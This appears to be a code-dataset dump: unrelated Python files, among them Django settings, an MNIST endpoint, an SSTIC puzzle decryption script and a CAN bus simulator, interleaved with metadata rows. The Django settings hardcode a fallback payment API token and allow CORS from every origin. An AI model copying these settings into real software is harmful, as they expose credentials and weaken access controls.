'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'aprepi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(BASE_DIR / "templates")],
'OPTIONS': {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
"loaders": [
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'aprepi.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(BASE_DIR / "staticfiles")
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = "/static/"
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [str(BASE_DIR / "static")]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(BASE_DIR / "media")
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = "/media/"
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "core:dashboard"
LOGOUT_REDIRECT_URL = "core:home"
LOGIN_URL = "users:login"
LOGOUT_URL = "users:logout"
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
TOKEN_MERCADO_PAGO = str(os.getenv('TOKEN_MERCADO_PAGO', default='AKJSJ1J2O10332BJ2KBKDA'))
# django-rest-framework
# -------------------------------------------------------------------------------
# django-rest-framework - https://www.django-rest-framework.org/api-guide/settings/
REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": (
# "rest_framework.authentication.SessionAuthentication",
# "rest_framework.authentication.TokenAuthentication",
"rest_framework_simplejwt.authentication.JWTAuthentication",
),
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 5,
"DEFAULT_SCHEMA_CLASS": "rest_framework.schemas.coreapi.AutoSchema",
"DEFAULT_PERMISSION_CLASSES": ("rest_framework.permissions.IsAuthenticated",),
"DEFAULT_FILTER_BACKENDS": ["django_filters.rest_framework.DjangoFilterBackend"],
"DEFAULT_THROTTLE_CLASSES": [
"rest_framework.throttling.AnonRateThrottle",
"rest_framework.throttling.UserRateThrottle"
],
"DEFAULT_THROTTLE_RATES": {
"anon": "50/day",
"user": "500/day"
}
}
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=60),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'AUTH_HEADER_TYPES': ('JWT',),
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
}
CORS_ORIGIN_ALLOW_ALL = True
| 30.457286 | 93 | 0.677446 | 617 | 6,061 | 6.484603 | 0.387358 | 0.061735 | 0.065984 | 0.074981 | 0.170957 | 0.170957 | 0.131967 | 0.109223 | 0.097476 | 0.053987 | 0 | 0.008372 | 0.152615 | 6,061 | 198 | 94 | 30.611111 | 0.770639 | 0.274212 | 0 | 0.02381 | 0 | 0.007937 | 0.557851 | 0.447199 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.039683 | 0.031746 | 0 | 0.031746 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbdfab240b21c157c3ec03cf2f8676f1335dc24e | 1,284 | py | Python | Chapter05/mnist.py | PacktPublishing/Hands-On-Deep-Learning-for-Images-with-TensorFlow | 1ced05560a4fc8b444e8524b0c896d5aa00e2fc7 | [
"MIT"
] | 16 | 2018-08-14T06:26:05.000Z | 2021-10-04T06:36:57.000Z | Chapter05/mnist.py | PacktPublishing/Hands-On-Deep-Learning-for-Images-with-TensorFlow | 1ced05560a4fc8b444e8524b0c896d5aa00e2fc7 | [
"MIT"
] | null | null | null | Chapter05/mnist.py | PacktPublishing/Hands-On-Deep-Learning-for-Images-with-TensorFlow | 1ced05560a4fc8b444e8524b0c896d5aa00e2fc7 | [
"MIT"
] | 14 | 2018-09-18T22:38:27.000Z | 2021-03-16T21:11:27.000Z | """
This module serves as the API provider for MNIST digit processing.
"""
import io
import json
import numpy as np
from keras.models import load_model
from PIL import Image
from PIL.ImageOps import fit, grayscale
MNIST_MODEL = load_model('var/data/mnist.h5')
print(MNIST_MODEL.summary())
def post_image(file):
    """
    Given a posted image, classify it using the pretrained MNIST model.

    The uploaded image may be any size; it is scaled down to 28x28
    (like the MNIST training data) and converted to grayscale before
    being fed to the network.

    Parameters
    ----------
    file:
        File-like object holding the uploaded image, in any format
        Pillow can open.

    Returns
    -------
    str
        JSON document of the form '{"digit": <0-9>}'.
    """
    # Use Pillow to decode the posted file into an image object.
    image = Image.open(io.BytesIO(file.read()))
    image = grayscale(fit(image, (28, 28)))
    image_bytes = image.tobytes()
    # The model expects a batch: shape (1, 28, 28, 1) -- one sample,
    # one (grayscale) channel.
    image_array = np.reshape(np.frombuffer(image_bytes, dtype=np.uint8), (1, 28, 28, 1))
    prediction = MNIST_MODEL.predict(image_array)
    # argmax reverses the one-hot encoding of the prediction.
    digit = np.argmax(prediction[0])
    # Convert to a plain int -- numpy.int64 isn't JSON serializable.
    return json.dumps({'digit': int(digit)})
| 32.923077 | 89 | 0.698598 | 193 | 1,284 | 4.595855 | 0.533679 | 0.033822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 0.200935 | 1,284 | 38 | 90 | 33.789474 | 0.846004 | 0.482866 | 0 | 0 | 0 | 0 | 0.035831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0 | 0.5 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bbe8258f0a5edf3dab38c8003822237f616cb41a | 628 | py | Python | dalme_app/utils/domain_middleware.py | DALME/dalme | 46f9a0011fdb75c5098b552104fc73b1062e16e9 | [
"BSD-3-Clause"
] | 6 | 2019-05-07T01:06:04.000Z | 2021-02-19T20:45:09.000Z | dalme_app/utils/domain_middleware.py | DALME/dalme | 46f9a0011fdb75c5098b552104fc73b1062e16e9 | [
"BSD-3-Clause"
] | 23 | 2018-09-14T18:01:42.000Z | 2021-12-29T17:25:18.000Z | dalme_app/utils/domain_middleware.py | DALME/dalme | 46f9a0011fdb75c5098b552104fc73b1062e16e9 | [
"BSD-3-Clause"
] | 1 | 2020-02-10T16:20:57.000Z | 2020-02-10T16:20:57.000Z | from django.http import HttpResponsePermanentRedirect
class SubdomainRedirectMiddleware:
    """Permanently redirect 'www.' / 'public.' hosts to the bare domain."""

    # host header -> canonical base URL to redirect to
    _REDIRECTS = {
        'www.dalme.org': "https://dalme.org",
        'public.dalme.org': "https://dalme.org",
        'www.127.0.0.1.sslip.io:8443': "https://127.0.0.1.sslip.io:8443",
        'public.127.0.0.1.sslip.io:8443': "https://127.0.0.1.sslip.io:8443",
    }

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        base = self._REDIRECTS.get(request.get_host())
        if base is not None:
            # 301 to the canonical host, preserving the request path.
            return HttpResponsePermanentRedirect(base + request.path)
        return self.get_response(request)
| 39.25 | 98 | 0.673567 | 78 | 628 | 5.25641 | 0.410256 | 0.107317 | 0.109756 | 0.043902 | 0.12439 | 0.12439 | 0.12439 | 0 | 0 | 0 | 0 | 0.059761 | 0.200637 | 628 | 15 | 99 | 41.866667 | 0.756972 | 0 | 0 | 0 | 0 | 0 | 0.213376 | 0.090764 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bbee8286c1b16f23c2fbea4885c81a4ff32f0eaa | 3,149 | py | Python | decrypt_next_level.py | fishilico/sstic-2016 | 9a05bb18df4c8d2e76f1e30fda6b38b1bc930e8c | [
"Beerware"
] | null | null | null | decrypt_next_level.py | fishilico/sstic-2016 | 9a05bb18df4c8d2e76f1e30fda6b38b1bc930e8c | [
"Beerware"
] | null | null | null | decrypt_next_level.py | fishilico/sstic-2016 | 9a05bb18df4c8d2e76f1e30fda6b38b1bc930e8c | [
"Beerware"
] | 1 | 2020-04-03T06:19:11.000Z | 2020-04-03T06:19:11.000Z | #!/usr/bin/env python3
"""Decrypt the data needed for the next level"""
import base64
import binascii
import hashlib
import json
import numpy
import sys
from Crypto.Cipher import AES
# The GCM field polynomial: x^128 + x^7 + x^2 + x + 1.
GCM_POLY = (1 << 128) + (1 << 7) + (1 << 2) + (1 << 1) + (1 << 0)


def invert_poly(p):
    """Return the multiplicative inverse of p in GF(2^128) (GCM field).

    Binary extended Euclid over GF(2): cofactors are maintained so that
    cof_small * p == 1 (mod GCM_POLY) when the loop terminates.
    """
    assert p > 0
    assert p.bit_length() <= 128
    big, small = GCM_POLY, p
    cof_big, cof_small = 0, 1
    while small != 1:
        shift = small.bit_length() - big.bit_length()
        if shift < 0:
            # Keep `small` as the shorter polynomial.
            big, small = small, big
            cof_big, cof_small = cof_small, cof_big
            shift = -shift
        small ^= big << shift
        cof_small ^= cof_big << shift
    return cof_small


def multiply_poly(x, y):
    """Carry-less multiply of x and y modulo GCM_POLY in GF(2^128)."""
    assert x.bit_length() <= 128
    assert y.bit_length() <= 128
    acc = 0
    for _ in range(128):
        if y & 1:
            acc ^= x
        y >>= 1
        x <<= 1
        if x.bit_length() > 128:
            # Reduce modulo the field polynomial.
            x ^= GCM_POLY
    return acc
# Sanity checks
assert multiply_poly(2, 1 << 127) == 0x87
assert invert_poly(1) == 1
assert invert_poly(2) == 0x80000000000000000000000000000043
assert multiply_poly(3, invert_poly(3)) == 1
if len(sys.argv) < 4:
print("Usage: {} path/to/next/data.json path/to/current/data.json path/to/passcode/1 ...".format(sys.argv[0]))
sys.exit(1)
with open(sys.argv[2]) as data_file:
jsondata = json.load(data_file)
ssspoints = []
for passcode_path in sys.argv[3:]:
# Read the code found after solving an enigma
with open(passcode_path, 'r') as pass_file:
passcode = binascii.unhexlify(pass_file.read().strip())
# Decrypt the encrypted shares
hpass = hashlib.sha256(passcode).hexdigest()
assert hpass in jsondata['shares'], "Invalid code!"
iv = binascii.unhexlify(jsondata['shares'][hpass]['iv'])
data = base64.b64decode(jsondata['shares'][hpass]['data'])
key = passcode
decrypted = AES.new(key, AES.MODE_CBC, iv).decrypt(data)
padlen = decrypted[-1]
assert all(x == padlen for x in decrypted[-padlen:])
decrypted = decrypted[:-padlen]
# Load the new points
for point in json.loads(decrypted.decode('ascii')):
# Convert y to a polynom
ssspoints.append((point['x'], int(point['y'], 16)))
# Interpolate the coefficients of "y = x^2 + a * x + b" curve
assert len(ssspoints) >= 2
x1, y1 = ssspoints[0]
x2, y2 = ssspoints[1]
y1 ^= multiply_poly(x1, x1)
y2 ^= multiply_poly(x2, x2)
coef_a = multiply_poly(y1 ^ y2, invert_poly(x1 ^ x2))
coef_b = y1 ^ multiply_poly(coef_a, x1)
for x, y in ssspoints:
assert y == multiply_poly(x, x) ^ multiply_poly(coef_a, x) ^ coef_b
# The key is the value of the curve at x=0
key = binascii.unhexlify(hex(coef_b)[2:])
# Decrypt data of next level
iv = binascii.unhexlify(jsondata['next_level']['iv'])
data = base64.b64decode(jsondata['next_level']['data'])
decrypted = AES.new(key, AES.MODE_CBC, iv).decrypt(data)
padlen = decrypted[-1]
assert all(x == padlen for x in decrypted[-padlen:])
decrypted = decrypted[:-padlen]
with open(sys.argv[1], 'wb') as next_file:
next_file.write(decrypted)
| 29.157407 | 114 | 0.62496 | 492 | 3,149 | 3.914634 | 0.272358 | 0.056075 | 0.024922 | 0.013499 | 0.172378 | 0.122534 | 0.122534 | 0.122534 | 0.122534 | 0.122534 | 0 | 0.055875 | 0.227056 | 3,149 | 107 | 115 | 29.429907 | 0.735415 | 0.150206 | 0 | 0.106667 | 0 | 0.013333 | 0.058113 | 0.017736 | 0 | 0 | 0.01434 | 0 | 0.173333 | 1 | 0.026667 | false | 0.12 | 0.093333 | 0 | 0.146667 | 0.013333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bbef9d9515fa58cd4632952527de7c91bf724f99 | 6,930 | py | Python | src/priority_selector.py | moibenko/enstore | 6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9 | [
"Intel",
"Unlicense"
] | 4 | 2021-10-17T11:17:59.000Z | 2022-02-28T16:58:40.000Z | src/priority_selector.py | moibenko/enstore | 6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9 | [
"Intel",
"Unlicense"
] | 17 | 2021-10-05T21:44:06.000Z | 2022-03-31T16:58:40.000Z | src/priority_selector.py | moibenko/enstore | 6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9 | [
"Intel",
"Unlicense"
] | 8 | 2021-09-02T18:55:49.000Z | 2022-03-09T21:05:28.000Z | #!/usr/bin/env python
###############################################################################
# $Id$
#
# system imports
import sys
import os
import stat
import errno
import string
import re
#import pcre has been deprecated
import copy
import traceback
import e_errors
import Trace
MAX_REG_PRIORITY = 1000001
class PriSelector:
def read_config(self):
Trace.log(e_errors.INFO, "(Re)loading priority")
self.exists = 0
dict=self.csc.get('priority',{})
if dict['status'][0] == e_errors.OK:
prioritydict=dict.get(self.library_manager, {})
else:
prioritydict = {}
if prioritydict:
self.exists = 1
self.prioritydict = prioritydict
self.base_dict = prioritydict.get('basepri',{})
self.adm_dict = prioritydict.get('adminpri',{})
self.base_pri_keys = self.base_dict.keys()
self.admin_pri_keys = self.adm_dict.keys()
self.base_pri_keys.sort()
self.base_pri_keys.reverse()
self.admin_pri_keys.sort()
self.admin_pri_keys.reverse()
return (e_errors.OK, None)
def __init__(self, csc, library_manager, max_reg_pri=MAX_REG_PRIORITY):
    # Cap applied to regular (non-admin) priorities.
    self.max_reg_pri = max_reg_pri
    # Name of the library manager whose priority section we read.
    self.library_manager = library_manager
    # Configuration server client used to fetch the 'priority' section.
    self.csc = csc
    self.read_config()
def ticket_match(self, ticket, pri_key, conf_key):
    """Return 1 if the ticket's value for conf_key matches the configured
    pattern, else 0.

    The configured value is treated as a regular expression anchored at
    the start of the ticket value ('^' is prepended).
    """
    pattern = "^%s" % (self.prioritydict[pri_key][conf_key],)
    item = '%s' % (ticket.get(conf_key, 'Unknown'),)
    try:
        return 1 if re.search(pattern, item) else 0
    except re.error:
        # Bad pattern in the priority configuration; the old code used a
        # bare `except:` that hid every failure. Log and treat as a
        # non-match instead of crashing the selector.
        Trace.log(e_errors.ERROR, "parse error")
        Trace.handle_error()
        return 0
#pcre is deprecated
#except pcre.error, detail:
# Trace.log(e_errors.ERROR,"parse errorr %s" % (detail, ))
# return 0
def priority(self, ticket):
#self.read_config()
if not self.exists: # no priority configuration info
return ticket['encp']['basepri'], ticket['encp']['adminpri']
# make a "flat" copy of ticket
# use deepcopy
flat_ticket=copy.deepcopy(ticket)
#flat_ticket.update(ticket)
# before making a ticket remove ['vc']['wrapper'] as it will interfere
# with 'wrapper' (see ticket structure)
if flat_ticket['vc'].has_key('wrapper'): del(flat_ticket['vc']['wrapper'])
for key in flat_ticket.keys():
if type(flat_ticket[key]) is type({}):
for k in flat_ticket[key].keys():
if k == 'machine': flat_ticket['host'] = flat_ticket[key][k][1]
else: flat_ticket[k] = flat_ticket[key][k]
del(flat_ticket[key])
cur_pri = flat_ticket['basepri']
cur_adm_pri = flat_ticket.get('adminpri',-1)
daq_enabled = flat_ticket.get('encp_daq',None)
# regular priority
self.prioritydict = self.base_dict
pri_keys = self.base_pri_keys
for pri_key in pri_keys:
conf_keys = self.prioritydict[pri_key].keys()
nkeys = len(conf_keys)
nmatches = 0
for conf_key in conf_keys:
# try to match a ticket
if not self.ticket_match(flat_ticket, pri_key, conf_key): break
nmatches = nmatches + 1
if nmatches == nkeys:
if (pri_key <= self.max_reg_pri):
if pri_key+cur_pri <= self.max_reg_pri:
cur_pri = pri_key+cur_pri
else:
cur_pri = pri_key+cur_pri
break
# admin priority
self.prioritydict = self.adm_dict
pri_keys = self.admin_pri_keys
for pri_key in pri_keys:
conf_keys = self.prioritydict[pri_key].keys()
nkeys = len(conf_keys)
nmatches = 0
for conf_key in conf_keys:
# try to match a ticket
if not self.ticket_match(flat_ticket, pri_key, conf_key): break
nmatches = nmatches + 1
if nmatches == nkeys:
if (pri_key <= self.max_reg_pri):
if pri_key+cur_adm_pri <= self.max_reg_pri:
cur_adm_pri = pri_key+cur_adm_pri
else:
cur_adm_pri = pri_key+cur_adm_pri
break
if cur_pri >= self.max_reg_pri:
if daq_enabled:
cur_adm_pri = cur_pri / self.max_reg_pri + cur_adm_pri
cur_pri = self.max_reg_pri
return cur_pri, cur_adm_pri
if __name__ == "__main__":
import configuration_client
def_addr = (os.environ['ENSTORE_CONFIG_HOST'],
string.atoi(os.environ['ENSTORE_CONFIG_PORT']))
csc = configuration_client.ConfigurationClient( def_addr )
ps = PriSelector(csc, 'mam.library_manager')
#ps.read_config()
ticket={'unique_id': 'happy.fnal.gov-959786955.526691-14962', 'at_the_top': 2,
'encp': {'delayed_dismount': 1, 'basepri': 1, 'adminpri': -1, 'curpri': 1,
'agetime': 0, 'delpri': 0}, 'fc': {'address': ('131.225.84.122', 7501),
'size': 5158L,
'external_label': 'null02'},
'vc': {'library': 'happynull', 'file_family_width':2,
'volume_family': 'D0.alex.null', 'address': ('131.225.84.122', 7502),
'wrapper': 'null', 'file_family': 'alex.null',
'at_mover': ('unmounted', 'none'), 'storage_group': 'D0'},
'times': {'t0': 959786955.184, 'in_queue': 2.62227797508,
'job_queued': 959786955.542, 'lm_dequeued': 959786958.164},
'wrapper': {'minor': 0, 'inode': 0,
'fullname': '/home/moibenko/enstore2/src/alarm.py',
'size_bytes': 5158L, 'gname': 'hppc', 'mode': 33261,
'gid': 5440, 'mtime': 959786955, 'sanity_size': 65536,
'machine': ('Linux',
'happy.fnal.gov',
'2.2.15',
'#4 SMP Tue May 30 13:35:20 CDT 2000', 'i686'),
'uname': 'moibenko',
'pstat': (16893, 70397816L,3, 1, 6849, 5440, 512L, 959704674, 959704674, 959704674),
'uid': 6849, 'pnfsFilename': '/pnfs/rip6/happy/NULL/d2/alarm_client.py',
'rminor': 0, 'rmajor': 0, 'type': 'null', 'major': 0},
'lm': {'address': ('131.225.84.122', 7503)}, 'callback_addr': ('131.225.84.122', 7600),
'work': 'write_to_hsm', 'retry': 2, 'status': ('ok', None)}
pri, adm_pri = ps.priority(ticket)
print "END"
print "Priority:",pri, adm_pri
| 41.005917 | 108 | 0.534921 | 817 | 6,930 | 4.305998 | 0.29131 | 0.048323 | 0.025583 | 0.029562 | 0.253269 | 0.204377 | 0.189596 | 0.166572 | 0.14838 | 0.132462 | 0 | 0.06003 | 0.331746 | 6,930 | 168 | 109 | 41.25 | 0.699633 | 0.072727 | 0 | 0.204545 | 0 | 0 | 0.144957 | 0.017863 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.015152 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbfc6b7501f68090857b839fbaec0575500721e9 | 1,387 | py | Python | main.py | BateauNautilus/drivesimulator | 290382f9c196a0daeca7a45a9abb792d1a035c8c | [
"MIT"
] | 1 | 2015-10-08T04:03:58.000Z | 2015-10-08T04:03:58.000Z | main.py | BateauNautilus/drivesimulator | 290382f9c196a0daeca7a45a9abb792d1a035c8c | [
"MIT"
] | null | null | null | main.py | BateauNautilus/drivesimulator | 290382f9c196a0daeca7a45a9abb792d1a035c8c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import time
from Message.CANMessage import MessageToCan
from Message.EnvironmentStatus import EnvironmentStatus
from Message.MotorStatus import MotorStatus
from Message.Parameters.Current import Current
from Message.Parameters.Humidity import Humidity
from Message.Parameters.Vibration import Vibration
from Message.Parameters.Voltage import Voltage
from Message.Parameters.WaterTemperature import WaterTemperature
from config import Config
from lib.pythoncan import can
from Message.Parameters.RPM import Rpm
tasks = {}
def main():
    # Open the CAN bus described by the project configuration.
    bus = can.interface.Bus(channel=Config.getChannel(), bustype=Config.getBusType())
    print('start_transmit()')
    sendMotorStatusMessage()
    sendEnvironmentStatusMessage()
    # Keep the process alive; the periodic send tasks run in the
    # background threads created by can.send_periodic().
    while True:
        time.sleep(20)
def sendMotorStatusMessage():
    # Build a motor-status frame with fixed demo values and schedule it
    # for periodic transmission at the message's own period; keep a
    # handle in `tasks` so the task is not garbage collected.
    msg = MotorStatus(rpm=Rpm(5000), voltage=Voltage(12.5), current=Current(2), vibration=Vibration(0.2))
    canmsg = MessageToCan(msg, deviceId=Config.getDeviceId())
    tasks['motorStatus'] = can.send_periodic(Config.getChannel(), canmsg, msg.period)
def sendEnvironmentStatusMessage():
    # Build an environment-status frame with fixed demo values and
    # schedule it for periodic transmission, keeping the task handle.
    msg = EnvironmentStatus(waterTemperature=WaterTemperature(5), humidity=Humidity(0.12))
    canmsg = MessageToCan(msg, deviceId=Config.getDeviceId())
    tasks['EnvironmentStatus'] = can.send_periodic(Config.getChannel(), canmsg, msg.period)
if __name__ == "__main__":
main() | 33.829268 | 105 | 0.777938 | 154 | 1,387 | 6.935065 | 0.357143 | 0.092697 | 0.117978 | 0.054307 | 0.181648 | 0.181648 | 0.181648 | 0.086142 | 0 | 0 | 0 | 0.013912 | 0.118962 | 1,387 | 41 | 106 | 33.829268 | 0.860065 | 0.015141 | 0 | 0.066667 | 0 | 0 | 0.038067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.5 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a51fa64bf6e06d03d20294775fe60521fe1d38d5 | 1,187 | py | Python | src/pyscaffoldext/nox/extension.py | SarthakJariwala/pyscaffoldext-nox | 7bb84218facaf8a8c03bad307abcbadd1f5a3459 | [
"MIT"
] | null | null | null | src/pyscaffoldext/nox/extension.py | SarthakJariwala/pyscaffoldext-nox | 7bb84218facaf8a8c03bad307abcbadd1f5a3459 | [
"MIT"
] | null | null | null | src/pyscaffoldext/nox/extension.py | SarthakJariwala/pyscaffoldext-nox | 7bb84218facaf8a8c03bad307abcbadd1f5a3459 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Implementation to add noxfile.py to
PyScaffold project
"""
from pathlib import PurePath
from pyscaffold.api import Extension, helpers
from .templates import noxfile
class Nox(Extension):
    """PyScaffold extension that adds a ``noxfile.py`` to new projects."""

    def activate(self, actions):
        """Hook the noxfile action into PyScaffold's action list.

        Args:
            actions (list): list of actions to perform

        Returns:
            list: updated list of actions
        """
        return self.register(actions, self.add_noxfile, after="define_structure")

    def add_noxfile(self, struct, opts):
        """Merge a rendered ``noxfile.py`` into the project structure.

        Args:
            struct (dict): project representation as (possibly) nested
                :obj:`dict`.
            opts (dict): given options, see :obj:`create_project` for
                an extensive list.

        Returns:
            struct, opts: updated project representation and options
        """
        target = PurePath(opts["project"], "noxfile.py")
        rendered = noxfile(opts)
        updated = helpers.ensure(struct, target, rendered, helpers.NO_OVERWRITE)
        return updated, opts
| 26.377778 | 84 | 0.611626 | 128 | 1,187 | 5.632813 | 0.46875 | 0.041609 | 0.036061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001193 | 0.294019 | 1,187 | 44 | 85 | 26.977273 | 0.859189 | 0.433024 | 0 | 0 | 0 | 0 | 0.061682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.25 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a5213db851bfc1609188f26a356155fd3f1f97df | 379 | py | Python | src/app/utils/string.py | meyer-net/robot | e35cf6d5a4293eaf7330a733f3e6f35f4789623c | [
"MIT"
] | 12 | 2018-07-31T02:47:42.000Z | 2019-04-29T05:40:46.000Z | src/app/utils/string.py | meyer-net/pyflink-framework.osteam.base | e35cf6d5a4293eaf7330a733f3e6f35f4789623c | [
"MIT"
] | null | null | null | src/app/utils/string.py | meyer-net/pyflink-framework.osteam.base | e35cf6d5a4293eaf7330a733f3e6f35f4789623c | [
"MIT"
] | 1 | 2020-04-22T08:53:46.000Z | 2020-04-22T08:53:46.000Z | # -- coding: UTF-8
class String(object):
    """String helper utilities."""

    def __init__(self):
        super(String, self).__init__()

    def class_name_normalize(self, class_name):
        """Normalize a snake_case name into a PascalCase class name.

        e.g. "my_service_proxy" -> "MyServiceProxy"
        """
        pieces = [segment[0].upper() + segment[1:].lower()
                  for segment in class_name.split("_")]
        return "".join(pieces)
a53297a29f41369c2fc2a2e92bcadad2a1cd0faf | 9,966 | py | Python | build/lib.linux-x86_64-2.7_ucs4/mx/DateTime/ISO.py | mkubux/egenix-mx-base | 3e6f9186334d9d73743b0219ae857564c7208247 | [
"eGenix"
] | null | null | null | build/lib.linux-x86_64-2.7_ucs4/mx/DateTime/ISO.py | mkubux/egenix-mx-base | 3e6f9186334d9d73743b0219ae857564c7208247 | [
"eGenix"
] | null | null | null | build/lib.linux-x86_64-2.7_ucs4/mx/DateTime/ISO.py | mkubux/egenix-mx-base | 3e6f9186334d9d73743b0219ae857564c7208247 | [
"eGenix"
] | null | null | null | """ This module provides a set of constructors and routines to convert
between DateTime[Delta] instances and ISO representations of date
and time.
Note: Timezones are only interpreted by ParseDateTimeGMT(). All
other constructors silently ignore the time zone information.
Copyright (c) 1998-2000, Marc-Andre Lemburg; mailto:mal@lemburg.com
Copyright (c) 2000-2015, eGenix.com Software GmbH; mailto:info@egenix.com
See the documentation for further information on copyrights,
or contact the author.
"""
import DateTime,Timezone
import re
# Grammar: ISO 8601 (not all, but what we need from it)
_year = '(?P<year>\d?\d\d\d)'
_month = '(?P<month>\d?\d)'
_day = '(?P<day>\d?\d)'
_hour = '(?P<hour>\d?\d)'
_minute = '(?P<minute>\d?\d)'
_second = '(?P<second>\d?\d(?:\.\d+)?)'
_sign = '(?P<sign>[-+])'
_week = 'W(?P<week>\d?\d)'
_zone = Timezone.isozone
_weekdate = _year + '-?(?:' + _week + '-?' + _day + '?)?'
_date = _year + '-?' + '(?:' + _month + '-?' + _day + '?)?'
_time = _hour + ':?' + _minute + ':?' + _second + '?(?:' + _zone + ')?'
isodatetimeRE = re.compile(_date + '(?:[ T]' + _time + ')?$')
isodateRE = re.compile(_date + '$')
isotimeRE = re.compile(_time + '$')
isodeltaRE = re.compile(_sign + '?' + _time + '$')
isoweekRE = re.compile(_weekdate + '$')
